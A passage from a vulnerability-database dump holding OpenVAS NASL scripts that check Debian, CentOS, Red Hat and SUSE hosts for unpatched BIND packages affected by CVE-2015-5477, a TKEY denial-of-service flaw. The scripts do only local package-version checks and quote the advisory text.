ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bind9-doc\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bind9-host\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bind9utils\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"dnsutils\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"host\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbind-dev\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbind9-80\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libdns88\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libisc84\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libisccc80\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libisccfg82\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"liblwres80\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lwresd\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-07-24T12:53:07", "bulletinFamily": "scanner", "description": "Jonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.", "modified": "2017-07-07T00:00:00", "published": "2015-07-28T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703319", "id": "OPENVAS:703319", "title": "Debian Security Advisory DSA 3319-1 (bind9 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3319.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3319-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703319);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-5477\");\n script_name(\"Debian Security Advisory DSA 3319-1 (bind9 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-07-28 00:00:00 +0200 (Tue, 28 Jul 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3319.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"bind9 on Debian Linux\");\n script_tag(name: \"insight\", value: \"The Berkeley Internet Name Domain (BIND) implements an Internet domain\nname server. BIND is the most widely-used name server software on the\nInternet, and is supported by the Internet Software Consortium, www.isc.org.\nThis package provides the server and related configuration files.\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (wheezy), this problem has been fixed\nin version 1:9.8.4.dfsg.P1-6+nmu2+deb7u6.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1:9.9.5.dfsg-9+deb8u2.\n\nWe recommend that you upgrade your bind9 packages.\");\n script_tag(name: \"summary\", value: \"Jonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"bind9\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9-doc\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9-host\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9utils\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dnsutils\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"host\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbind-dev\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbind9-80\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdns88\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisc84\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisccc80\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisccfg82\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblwres80\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lwresd\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:26", "bulletinFamily": "scanner", "description": "Check the version of bind97", "modified": "2019-03-08T00:00:00", "published": "2015-08-10T00:00:00", "id": "OPENVAS:1361412562310882233", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882233", "title": "CentOS Update for bind97 CESA-2015:1515 centos5", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bind97 CESA-2015:1515 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882233\");\n script_version(\"$Revision: 14058 $\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-10 12:58:28 +0530 (Mon, 10 Aug 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for bind97 CESA-2015:1515 centos5\");\n script_tag(name:\"summary\", value:\"Check the version of bind97\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named) a resolver\nlibrary (routines for applications to use when interfacing with DNS) and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"bind97 on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:1515\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-July/021269.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind97\", rpm:\"bind97~9.7.0~21.P2.el5_11.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-chroot\", rpm:\"bind97-chroot~9.7.0~21.P2.el5_11.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-devel\", rpm:\"bind97-devel~9.7.0~21.P2.el5_11.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-libs\", rpm:\"bind97-libs~9.7.0~21.P2.el5_11.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind97-utils\", rpm:\"bind97-utils~9.7.0~21.P2.el5_11.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:26", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2015-08-03T00:00:00", "id": "OPENVAS:1361412562310871420", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871420", "title": "RedHat Update for bind RHSA-2015:1513-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for bind RHSA-2015:1513-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871420\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-03 15:08:02 +0530 (Mon, 03 Aug 2015)\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for bind RHSA-2015:1513-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named) a resolver\nlibrary (routines for applications to use when interfacing with DNS) and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"bind on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:1513-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-July/msg00050.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind-license\", rpm:\"bind-license~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs-lite\", rpm:\"bind-libs-lite~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.8.2~0.37.rc1.el6_7.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.8.2~0.37.rc1.el6_7.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.8.2~0.37.rc1.el6_7.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.8.2~0.37.rc1.el6_7.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.8.2~0.37.rc1.el6_7.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-31T18:38:46", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851081", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851081", "title": "SUSE: Security Advisory for bind (SUSE-SU-2015:1305-1)", "type": "openvas", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851081\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 19:39:36 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for bind (SUSE-SU-2015:1305-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"bind was updated to fix one security issue.\n\n This security issue was fixed:\n\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\n Exposure to this issue can not be prevented by either ACLs or\n configuration options limiting or denying service because the exploitable\n code occurs early in the packet handling.\");\n\n script_tag(name:\"affected\", value:\"bind on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:1305-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debugsource\", rpm:\"bind-debugsource~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-32bit\", rpm:\"bind-libs-32bit~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo-32bit\", rpm:\"bind-libs-debuginfo-32bit~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo\", rpm:\"bind-libs-debuginfo~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ind-utils-debuginfo\", rpm:\"ind-utils-debuginfo~9.9.6P1~23.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-chrootenv\", rpm:\"bind-chrootenv~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debugsource\", rpm:\"bind-debugsource~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo\", rpm:\"bind-libs-debuginfo~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils-debuginfo\", rpm:\"bind-utils-debuginfo~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-32bit\", rpm:\"bind-libs-32bit~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo-32bit\", rpm:\"bind-libs-debuginfo-32bit~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-doc\", rpm:\"bind-doc~9.9.6P1~23.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:34", "bulletinFamily": "scanner", "description": "Check the version of bind", "modified": "2019-03-08T00:00:00", "published": "2015-08-10T00:00:00", "id": "OPENVAS:1361412562310882234", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882234", "title": "CentOS Update for bind CESA-2015:1513 centos7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bind CESA-2015:1513 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882234\");\n script_version(\"$Revision: 14058 $\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-10 12:58:28 +0530 (Mon, 10 Aug 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for bind CESA-2015:1513 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of bind\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named) a resolver\nlibrary (routines for applications to use when interfacing with DNS) and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could 